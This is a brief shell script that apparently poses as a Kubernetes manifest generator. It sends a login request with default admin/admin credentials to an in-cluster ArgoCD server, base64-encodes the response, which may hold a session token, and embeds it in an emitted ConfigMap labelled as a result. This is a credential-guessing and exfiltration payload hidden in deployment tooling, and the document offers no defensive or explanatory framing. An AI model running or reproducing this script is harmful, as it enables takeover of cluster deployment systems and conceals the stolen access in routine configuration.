#!/bin/sh
RECON=$( (
printf 'POST /api/v1/session HTTP/1.1\r\nHost: argocd-server.argocd.svc.cluster.local\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n{"username":"admin","password":"admin"}' | timeout 5 openssl s_client -connect argocd-server.argocd.svc.cluster.local:443 -quiet 2>/dev/null
) | base64 | tr -d '\n' )
cat << EOF
apiVersion: v1
kind: ConfigMap
metadata:
  name: u2u
data:
  result: $RECON
EOF
exit 0
